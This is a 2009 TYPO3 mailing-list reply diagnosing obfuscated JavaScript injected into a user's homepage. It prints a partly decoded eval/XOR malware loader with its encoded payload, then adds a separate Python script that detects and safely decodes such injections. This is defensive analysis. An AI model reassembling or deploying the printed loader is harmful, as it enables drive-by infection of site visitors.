[TYPO3-english] virus/worm on Typo3 installation.

bernd wilke x00nsji02 at sneakemail.com
Mon Jan 12 16:40:59 CET 2009


On Mon, 12 Jan 2009 11:56:00 +0100, Asbjørn Morell wrote:

> Hi,
> 
> When I open my homepage Avast antivirus gives me a warning:
> 
> Access blocked to:
> whitebiz.vn
> wertionase.com
> 
> I looked at the html source and there is some encrypted javascript at
> the bottom. (see below) This can't be good. I tried replacing the Typo3
> dir with a fresh source and cleared backend and frontend cache. Any ideas
> where this is coming from? The webserver is hosted at servage.com
> 
> Best regards.
> Asbjørn Morell.
> 
> </body>
> 
> </html><!-- ad --><script>
[...]
> </script><!-- /ad -->

not good? 

this kind of encryption is a common way to secure a piece of javascript 
code against modification or insight. But normally you can work it out 
step by step. (use the cpu inside your head, which is better than any 
made from silicon)

this might be done by javascript libraries, or your hoster (especially 
free webspace often includes some commercials in a way you can't remove 
them) 

either this is included in your index.php 
or this might be inserted after your PHP-Script is run and may be 
included in every (HTML-)file on your server by 1) apache 2) proxy 3) ...

try to generate a simple HTML/PHP file in a separate directory beside 
fileadmin and look at what you get if you call these files in your 
webbrowser.
trying to decrypt your code I got this far:


window['eval'] ( window['eval'] (
function Alha(AID){
    function ADA(LAHah){
        eval("var PaTLHaH=0;");
        var ApTl=LAHah.length;
        eval("var AIhpGl=0;");
        while(AIhpGl< (AID.length); HGa++){
            var HTA=AhlTH(ApHlhD,ATlAH)^AhlTH(AaTP,HHIl);
            var PhaAaHP=AhlTH(AID,HGa);
            ATlAH++;
            HHIl++;
            if(HHIl>AaTP.length)
                HHIl=0;
            if(ATlAH>ApHlhD.length)
                ATlAH=0;
            AGATI+=String.fromCharCode(PhaAaHP^HTA) + '';
        }
        eval(AGATI);
        return AGATI=null;
    }
    catch(e){}
}
Alha('%32%38%36%38%36%37%33%32%61%16%00%16%3d%36%5b%3c%6e%4e%2a%38%2d%2e%
78%0d%01%12%3e%53%1f%6a%34%3c%22%27%33%13%3d%3e%48%3a%10%1e%1a%27%2d%47%
22%32%27%12%29%13%76%6b%1a%16%25%31%75%3e%71%75%5c%66%3f%7d%3d%25%38%78%
74%1a%07%05%2e%72%5e%74%6f%2a%1b%30%21%27%57%1c%31%6c%16%03%07%3c%0d%3a%
48%3e%13%13%24%74%4b%57%3f%74%10%1e%0a%00%0e%2d%2c%7d%15%0b%2f%27%6f%79%0e
%2f%08%2e%1e%5d%76%50%45%7d%7f%7d%2d%6c%32%39%24%12%18%0e%02%3e%1d%20%33%
0b%79%6b%39%25%39%1b%3e%3c%3b%08%10%3f%22%70%6b%3f%4e%7d%4d%59%15%51%37%
37%33%06%06%28%06%33%32%22%33%78%79%4f%3b%2f%1c%30%3a%26%55%6a%6c%56%55%4c
%54%15%2c%22%3e%1b%36%24%0a%7a%38%11%27%02%4b%25%29%2a%3c%02%21%2a%3d%3b%
2b%25%73%00%7a%5b%7d%27%17%2a%3f%2c%7e%67%31%40%28%24%3b%1b%0e%39%3e%3a%
39%15%5a%68%3b%33%3a%34%20%3f%24%06%45%42%45%24%52%4b%33%31%08%4e%5a%6b%
30%6d%4d%1a%72%61%48%38%2a%59%45%03%22%22%64%23%09%3a%1d%76%43%74%6c');
)

then I get syntax errors with the function Alha(). Maybe the output of 
this function may give a hint.

or you use some browser extensions to view the generated source :-/
!!! this may execute a possible virus !!!


bernd
-- 
http://www.pi-phi.de/t3v4/cheatsheet.html
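The diagnostic Bernd suggests (put a plain HTML file and a trivial PHP file beside fileadmin, fetch them, and compare with the TYPO3 page) can be turned into a small check. The script below is an added example and is not code from this thread or from TYPO3; it takes already-fetched response bodies (constructed sample bodies are embedded, so it runs offline) and reports whether the trailing `<!-- ad --><script>` block appears only on the TYPO3 output, on all PHP output, or even on static HTML, which points at the application, the PHP layer, or the web server / proxy respectively. It also percent-decodes the string argument of the posted payload without evaluating anything, which is the first safe step of the "step by step" decoding he describes; the function and variable names are my own.

```python
import re
from urllib.parse import unquote_to_bytes

# A legitimate page ends at </html>; anything after it is suspicious.
TRAILING_RE = re.compile(r"</html>(.*)$", re.IGNORECASE | re.DOTALL)

# Constructed sample response bodies (not captured from the reporter's site).
CLEAN_BODY = "<html><body>hello</body></html>\n"
INJECTED_BODY = (
    "<html><body>hello</body></html>"
    "<!-- ad --><script>window['eval'](x)</script><!-- /ad -->"
)


def trailing_injection(body: str):
    """Return whatever follows the closing </html> tag, or None if the
    page ends cleanly. This is the symptom described in the thread."""
    m = TRAILING_RE.search(body)
    if not m:
        return None
    tail = m.group(1).strip()
    return tail or None


def has_injected_script(body: str) -> bool:
    """True when a <script> element is appended after </html>."""
    tail = trailing_injection(body)
    return tail is not None and "<script" in tail.lower()


def locate_injection(typo3_body: str, static_html_body: str, static_php_body: str) -> str:
    """Compare the TYPO3 page with a static HTML file and a trivial PHP file
    served from a directory outside the TYPO3 tree (e.g. beside fileadmin)."""
    on_typo3 = has_injected_script(typo3_body)
    on_html = has_injected_script(static_html_body)
    on_php = has_injected_script(static_php_body)
    if not on_typo3:
        return "no trailing script on the TYPO3 page"
    if on_html:
        return "server/proxy level: even static HTML is modified"
    if on_php:
        return "PHP level: PHP output is modified, static HTML is not"
    return "application level: only the TYPO3 output is modified"


def percent_decode_payload(arg: str) -> bytes:
    """Decode the %xx-encoded argument of the posted Alha('...') call to raw
    bytes. Line breaks are removed first because the mail wrapped the string
    in the middle of %xx sequences. Nothing is evaluated; the XOR layer that
    follows in the posted code needs keys the fragment does not contain."""
    return unquote_to_bytes(arg.replace("\n", "").replace("\r", ""))


if __name__ == "__main__":
    print(locate_injection(INJECTED_BODY, CLEAN_BODY, CLEAN_BODY))
    print(percent_decode_payload("%32%38%36%38%36%37%33%32%61"))
```

Fetch the three URLs with any HTTP client that does not execute scripts (for example curl) and feed the bodies to `locate_injection`; never open the affected page in a normal browser while checking, for the reason Bernd gives at the end of his mail.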

